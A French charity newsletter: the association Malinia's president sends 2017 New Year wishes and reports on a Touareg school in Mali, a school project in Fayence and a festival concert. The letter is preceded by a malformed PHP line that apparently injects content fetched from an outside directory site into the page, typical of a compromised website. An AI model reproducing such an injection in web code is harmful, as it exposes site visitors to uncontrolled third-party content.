<? echo file_get_contents("http://www;liste-annuaires.com/listeannuaires.php); ?>

Voeux du Président

                                                                                                                  10 janvier 2017

                                                                   Chers Amis de Malinia,

 

                              L'année écoulée fut très éprouvante pour nos amis touareg de Karkadjane au Mali et de Niamey au Niger.

                              Les attaques djihadistes, le brigandage et l'absence de pluie ont obligé les villageois à s'éloigner souvent de plusieurs dizaines de km du village pour se protéger et pour trouver un pâturage suffisant pour le bétail. Évidemment, la rentrée scolaire fut réduite en nombre d'élèves présents ; c'est maintenant presque redevenu normal, environ entre 65 et 85 élèves chaque jour (plus de 100 sont inscrits). Le deuxième instituteur prévu n'est toujours pas arrivé . Attayoub, le directeur de l'école, toujours seul, espère son arrivée en Janvier.

                              Nous avons pu financièrement faire face aux besoins et aujourd'hui les élèves, tous en difficulté nutritionnelle, ont accès à 2 repas par jour : un petit déjeuner à l'arrivée à l'école et un déjeuner en fin de classe. Nous avons également financé le matériel scolaire (livres, cahiers, etc.), fait réparer les tables et les bancs de l'école qui étaient détruits, fait également entièrement restaurer (maçonnerie et peintures) les murs de l'école et de la maison-grenier où sont stockés les aliments.

                              Nous avons ouvert une boîte postale à Tombouctou au nom de l'association.

                              Notre intervention au Collège de Fayence, durant l'année scolaire, auprès d'une classe de cinquième, sous la houlette de Madame Pascale Lemaire, professeur de Français, et grâce à notre amie Patricia Tozzi, s'est déroulée admirablement ; élèves attentifs, curieux et d'une vivacité intelligente et chaleureuse. Merci à Madame la Proviseur et à son adjoint de nous avoir aidés et permis d'accéder aux enfants.

                              Nous avons participé au Festival Africain Bagiliba à Fayence, comme les années précédentes, avec la présence de notre stand sur le marché, et surtout organisé la venue du groupe musical TOUMAST, groupe célébrissime touareg, qui a régalé une salle comble et enthousiaste d'un concert de très haute qualité.

                              Je vous remercie tous, militants actifs, amis donateurs, parrains d'enfants scolarisés, de votre fidélité et vous incite à consulter le plus souvent possible notre site que nos amis Monique et Jean-Claude Lorin alimentent régulièrement.

                              Recevez tous mes vœux pour la nouvelle année avec toute notre amitié.

                                                                                                     Claude Boursin